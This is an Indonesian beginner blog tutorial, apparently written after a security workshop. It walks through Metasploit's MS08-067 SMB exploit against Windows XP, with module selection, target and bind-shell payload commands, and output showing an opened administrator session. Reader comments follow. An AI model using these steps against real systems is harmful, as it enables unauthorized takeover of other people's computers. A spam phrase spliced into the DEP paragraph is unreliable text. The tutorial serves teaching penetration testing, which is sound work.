Metasploit Tutorial [newbee Edition]

Posted on 4 May 2009 by

Setelah tersampaikan materi bertemakan Hacking and Security di acara workshop KCS 2009 kamis kemarin, barangkali masih ada yang belum “ngeh” dengan materi yang diberikan, terutama dibagian pemberdayagunaan x-sploit yang berframework..  :??

Jadi, tak buatken tutorial ini, kwkkw… [sebenarnya hanya copas dari blog gw dink…] :D

===============================================================================

Seperti yang telah kita ketahui, metasploit framework adalah sebuah penetration tool yang cukup powerfull dalam melakukan sebuah penestrasi ke sebuah system. Dan ini bisa menjadi sebuah pedang yang mempunyai 2 sisi, digunakan sebagai analyst system tool atau digunakan untuk melakukan kegiatan negatif yang berakhir pada attacking. Melalui artikel ini, saya memberikan salah satu contoh penggunaan MF dalam melakukan sesi gaining access.

Kali ini kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu). So, let”s use linux friends.. ;p

Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau nbso online casino reviews sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya..

Pertama anda siapkan metasploit dengan update terbaru
(cara ini berlaku untuk minimal versi framework 3.2-testing.5773)

msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773

lalu anda pilih modul exlpoitnya, seperti berikut :

msf > use windows/smb/ms08_067_netapi

untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :

msf exploit(ms08_067_netapi) > show options

lalu anda set target

msf exploit(ms08_067_netapi) > set RHOST 192.168.54.xx
RHOST => 192.168.54.xx

kemudian anda set PAYLOAD

msf exploit(ms08_067_netapi) > set PAYLOAD Generic/Shell_Bind_TCP

Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih Generic/Shell_Bind_TCP, maksudnya kita akan mengambil alih Shell Bind (kalau di lingkungan windows dikenal sebagai Command Prompt) dari target hacking kita.
Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.

kemudian tinggal jalankan EXPLOIT-nya :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.54.xx:4444)

Dan jika berhasil maka anada akan disuguhi sebuah window baru berisi sebuah layar Command Prompt dari komputer target dan anda mempunyai level administrator.

Oh ya, cara diatas memang sengaja saya gunakan MF yang versi console, sebenarnya ada versi GUI-nya dan juga yang WEB based.
Saya menggunakan console karena saya tertarik dengan quote dari distro linux xcode : hacker tidak membutuhkan tampilan yang memukau ;p
Namun, keputusan akhir terserah pada anda.

Reference :
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://blog.delaforta.net/

Demikian semoga bisa bermanfaat bagi rekan-rekan sekalian.

Related Post

42 Comments

khugank

3 May 2010

knp ga ada yg di jawab ni??parah ni tutorial dah pernah di coba pa cuma sekedar mimpi??


ramadhan

14 April 2010

Cannot access virtual machine console. The request timed out.
Try Again
Close
The attempt to acquire a valid session ticket for “*********” took longer than expected. If this problem persists, contact your system administrator.


leo

8 April 2010

Exploit completed, but no session was created. G da responnya nih,gggrrrr…


ugly

17 March 2010

Exploit completed, but no session was created.


ask

23 January 2010

thanks..saya sudah bisa..


Post a Comment

Your email is never shared.